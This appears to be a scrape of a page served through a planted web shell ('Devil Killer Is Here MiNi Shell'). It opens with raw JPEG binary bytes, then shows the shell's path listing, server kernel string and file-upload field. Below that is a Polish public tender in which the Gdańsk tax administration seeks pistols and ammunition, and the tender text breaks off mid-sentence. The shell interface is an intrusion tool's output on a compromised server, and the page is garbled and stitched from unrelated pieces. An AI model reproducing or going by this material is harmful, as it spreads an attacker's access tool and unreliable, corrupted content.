JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250407/0017830601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa pistoletów pełnowymiarowych i kompaktowych oraz amunicji strzeleckiej na potrzeby Izby Administracji Skarbowej w Gdańsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Izba Administracji Skarbowej w Gdańsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001021197</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 75/76</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-831</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.ias.gdansk@mf.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pomorskie.kas.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa pistoletów pełnowymiarowych i kompaktowych oraz amunicji strzeleckiej na potrzeby Izby Administracji Skarbowej w Gdańsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-74c691ad-ddf4-4c9e-9f58-9d9e42066721</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00178306</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00111791/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup amunicji dla IAS w Gdańsku</p> <p class="mb-0">1.2.2 Zakup broni na potrzeby IAS w Gdańsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-74c691ad-ddf4-4c9e-9f58-9d9e42066721 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Maksymalny rozmiar plików przesyłanych za pośrednictwem Formularzy do komunikacji wynosi 150 MB; wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza.<br/>2. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. Zaleca się stosowanie aktualnie wspieranych wersji oprogramowania.<br/>3. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e- Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce Zgłoś problem.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje zawarte zostały w SWZ, Rozdział 1</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje zawarte zostały w SWZ, Rozdział 1</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2201-ILZ.260.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 357723,58 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa pistoletów pełnowymiarowych i kompaktowych oraz amunicji strzeleckiej na potrzeby Izby Administracji Skarbowej w Gdańsku. Zamówienie zostało podzielone na 3 (trzy) części. <br/>1. części nr 1 przedmiotu zamówienia: dostawa pistoletów pełnowymiarowych; zamówienie podstawowe - 30 szt. <br/>Szczegółowy opis przedmiotu zamówienia określający wymagania Zamawiającego w zakresie wykonania przedmiotu zamówienia stanowi:<br/>a)	Załącznik nr 1 a) do SWZ - Opis przedmiotu zamówienia dla części nr 1 oraz dla części nr 2 przedmiotu zamówienia, <br/>b)	Załącznik nr 1 b) do SWZ - Opis przedmiotu zamówienia dla części nr 3 przedmiotu zamówienia, <br/>c)	Załącznik nr 6 do SWZ - Projektowane Postanowienia Umowy,<br/>d)	niniejsza Specyfikacja Warunków Zamówienia.<br/>Wykonawca dostarczy do siedziby Jednostki Zamawiającego, tj. : wskazanego magazynu broni na terytorium RP, lub na miejsce odrębnie wskazane przez Zamawiającego, przedmiot zamówienia fabrycznie nowy, kompletny, gotowy do użytkowania, wyprodukowany nie wcześniej niż:<br/>1)	dla części nr 1 przedmiotu zamówienia – nie wcześniej niż w 2024 r. <br/>Wykonawca zobowiązuje się dostarczyć przedmiot zamówienia nieużywany, wolny od wad, w tym również od wad prawnych, nie poddawany jakimkolwiek naprawom, do przedmiotu zamówienia nie mają jakichkolwiek praw osoby trzecie, nie są przedmiotem żadnego postępowania lub zabezpieczenia oraz spełniają polskie wymagania, w tym warunki techniczne określone w Załączniku nr 1a) oraz Załączniku 1b) do SWZ, tj. Opisie przedmiotu zamówienia.<br/>Wykonawca udzieli następującej gwarancji na przedmiot zamówienia:<br/>a)	na część nr 1 przedmiotu zamówienia – minimum 24 miesiące. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 68292,68 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">35321100-1 - Pistolety</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z realizacją przedmiotu zamówienia, zgodnie z art. 441 ust. 1 ustawy, Zamawiający przewiduje możliwość skorzystania z prawa opcji, w zakresie zmian ilości zakupu amunicji i broni: <br/>1) w Załączniku nr 2 do SWZ - Formularz ofertowy, wskazano:<br/>a) łączną wartość zamówienia uwzględniającą prawo opcji, <br/>b) wartość zamówienia podstawowego, <br/>2) zakres zamówienia podstawowego stanowi minimalną wielkość zamówienia, którą Zamawiający zobowiązuje się zrealizować, <br/>3) Zamawiający przewiduje możliwość skorzystania z uprawnień wynikających z prawa opcji, polegającej na rozszerzeniu ilości zamówienia podstawowego w następującej wielkości: <br/>a) dla części na 1 przedmiotu zamówienia – dostawa pistoletów pełnowymiarowych – w wysokości 50 % wartości zamówienia podstawowego, <br/>b) dla części na 2 przedmiotu zamówienia – dostawa pistoletów kompaktowych – w wysokości 50 % wartości zamówienia podstawowego, <br/>c) dla części nr 3 przedmiotu zamówienia – dostawa amunicji strzeleckiej - w wysokości 50 % wartości zamówienia podstawowego, <br/>4) skorzystanie przez Zamawiającego z uprawnień wynikających z prawa opcji nie stanowić będzie zmiany Umowy, <br/>5) Wykonawcy nie przysługuje prawo domagania się realizacji zamówienia w zakresie rozszerzonym, jeżeli Zamawiający nie skorzysta z uprawnień wynikających z prawa opcji w trakcie realizacji Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dodatkowej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa pistoletów pełnowymiarowych i kompaktowych oraz amunicji strzeleckiej na potrzeby Izby Administracji Skarbowej w Gdańsku. Zamówienie zostało podzielone na 3 (trzy) części. <br/>1. części nr 2 przedmiotu zamówienia: dostawa pistoletów kompaktowych; zamówienie podstawowe - 70 szt. <br/>Szczegółowy opis przedmiotu zamówienia określający wymagania Zamawiającego w zakresie wykonania przedmiotu zamówienia stanowi:<br/>a)	Załącznik nr 1 a) do SWZ - Opis przedmiotu zamówienia dla części nr 1 oraz dla części nr 2 przedmiotu zamówienia, <br/>b)	Załącznik nr 1 b) do SWZ - Opis przedmiotu zamówienia dla części nr 3 przedmiotu zamówienia, <br/>c)	Załącznik nr 6 do SWZ - Projektowane Postanowienia Umowy,<br/>d)	niniejsza Specyfikacja Warunków Zamówienia.<br/>Wykonawca dostarczy do siedziby Jednostki Zamawiającego, tj. : wskazanego magazynu broni na terytorium RP, lub na miejsce odrębnie wskazane przez Zamawiającego, przedmiot zamówienia fabrycznie nowy, kompletny, gotowy do użytkowania, wyprodukowany nie wcześniej niż:<br/>1)	dla części nr 2 przedmiotu zamówienia – nie wcześniej niż w 2024 r. <br/>Wykonawca zobowiązuje się dostarczyć przedmiot zamówienia nieużywany, wolny od wad, w tym również od wad prawnych, nie poddawany jakimkolwiek naprawom, do przedmiotu zamówienia nie mają jakichkolwiek praw osoby trzecie, nie są przedmiotem żadnego postępowania lub zabezpieczenia oraz spełniają polskie wymagania, w tym warunki techniczne określone w Załączniku nr 1a) oraz Załączniku 1b) do SWZ, tj. Opisie przedmiotu zamówienia.<br/>Wykonawca udzieli następującej gwarancji na przedmiot zamówienia:<br/>a)	na część nr 2 przedmiotu zamówienia – minimum 24 miesiące. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 159349,59 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">35321100-1 - Pistolety</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z realizacją przedmiotu zamówienia, zgodnie z art. 441 ust. 1 ustawy, Zamawiający przewiduje możliwość skorzystania z prawa opcji, w zakresie zmian ilości zakupu amunicji i broni: <br/>1) w Załączniku nr 2 do SWZ - Formularz ofertowy, wskazano:<br/>a) łączną wartość zamówienia uwzględniającą prawo opcji, <br/>b) wartość zamówienia podstawowego, <br/>2) zakres zamówienia podstawowego stanowi minimalną wielkość zamówienia, którą Zamawiający zobowiązuje się zrealizować, <br/>3) Zamawiający przewiduje możliwość skorzystania z uprawnień wynikających z prawa opcji, polegającej na rozszerzeniu ilości zamówienia podstawowego w następującej wielkości: <br/>a) dla części na 1 przedmiotu zamówienia – dostawa pistoletów pełnowymiarowych – w wysokości 50 % wartości zamówienia podstawowego, <br/>b) dla części na 2 przedmiotu zamówienia – dostawa pistoletów kompaktowych – w wysokości 50 % wartości zamówienia podstawowego, <br/>c) dla części nr 3 przedmiotu zamówienia – dostawa amunicji strzeleckiej - w wysokości 50 % wartości zamówienia podstawowego, <br/>4) skorzystanie przez Zamawiającego z uprawnień wynikających z prawa opcji nie stanowić będzie zmiany Umowy, <br/>5) Wykonawcy nie przysługuje prawo domagania się realizacji zamówienia w zakresie rozszerzonym, jeżeli Zamawiający nie skorzysta z uprawnień wynikających z prawa opcji w trakcie realizacji Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dodatkowej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa pistoletów pełnowymiarowych i kompaktowych oraz amunicji strzeleckiej na potrzeby Izby Administracji Skarbowej w Gdańsku.Zamówienie zostało podzielone na 3 (trzy) części. <br/>1. części nr 3 przedmiotu zamówienia: dostawa amunicji strzeleckiej 9x19 FMJ; zamówienie podstawowe - 165.000 szt.<br/>Szczegółowy opis przedmiotu zamówienia określający wymagania Zamawiającego w zakresie wykonania przedmiotu zamówienia stanowi:<br/>a)	Załącznik nr 1 a) do SWZ - Opis przedmiotu zamówienia dla części nr 1 oraz dla części nr 2 przedmiotu zamówienia, <br/>b)	Załącznik nr 1 b) do SWZ - Opis przedmiotu zamówienia dla części nr 3 przedmiotu zamówienia, <br/>c)	Załącznik nr 6 do SWZ - Projektowane Postanowienia Umowy,<br/>d)	niniejsza Specyfikacja Warunków Zamówienia.<br/>Wykonawca dostarczy do siedziby Jednostki Zamawiającego, tj. : wskazanego magazynu broni na terytorium RP, lub na miejsce odrębnie wskazane przez Zamawiającego, przedmiot zamówienia fabrycznie nowy, kompletny, gotowy do użytkowania, wyprodukowany nie wcześniej niż:<br/>1)	dla części nr 3 przedmiotu zamówienia – nie wcześniej niż w 2024 r. <br/>Wykonawca zobowiązuje się dostarczyć przedmiot zamówienia nieużywany, wolny od wad, w tym również od wad prawnych, nie poddawany jakimkolwiek naprawom, do przedmiotu zamówienia nie mają jakichkolwiek praw osoby trzecie, nie są przedmiotem żadnego postępowania lub zabezpieczenia oraz spełniają polskie wymagania, w tym warunki techniczne określone w Załączniku nr 1a) oraz Załączniku 1b) do SWZ, tj. Opisie przedmiotu zamówienia.<br/>Wykonawca udzieli następującej gwarancji na przedmiot zamówienia:<br/>a)	na część nr 3 przedmiotu zamówienia – 24 miesiące. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 130081,30 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">35330000-6 - Amunicja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z realizacją przedmiotu zamówienia, zgodnie z art. 441 ust. 1 ustawy, Zamawiający przewiduje możliwość skorzystania z prawa opcji, w zakresie zmian ilości zakupu amunicji i broni: <br/>1) w Załączniku nr 2 do SWZ - Formularz ofertowy, wskazano:<br/>a) łączną wartość zamówienia uwzględniającą prawo opcji, <br/>b) wartość zamówienia podstawowego, <br/>2) zakres zamówienia podstawowego stanowi minimalną wielkość zamówienia, którą Zamawiający zobowiązuje się zrealizować, <br/>3) Zamawiający przewiduje możliwość skorzystania z uprawnień wynikających z prawa opcji, polegającej na rozszerzeniu ilości zamówienia podstawowego w następującej wielkości: <br/>a) dla części na 1 przedmiotu zamówienia – dostawa pistoletów pełnowymiarowych – w wysokości 50 % wartości zamówienia podstawowego, <br/>b) dla części na 2 przedmiotu zamówienia – dostawa pistoletów kompaktowych – w wysokości 50 % wartości zamówienia podstawowego, <br/>c) dla części nr 3 przedmiotu zamówienia – dostawa amunicji strzeleckiej - w wysokości 50 % wartości zamówienia podstawowego, <br/>4) skorzystanie przez Zamawiającego z uprawnień wynikających z prawa opcji nie stanowić będzie zmiany Umowy, <br/>5) Wykonawcy nie przysługuje prawo domagania się realizacji zamówienia w zakresie rozszerzonym, jeżeli Zamawiający nie skorzysta z uprawnień wynikających z prawa opcji w trakcie realizacji Umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>a)	nie podlegają wykluczeniu z udziału w postępowaniu na podstawie przesłanek określonych w Rozdziale 6 SWZ, <br/>b)	spełniają warunki 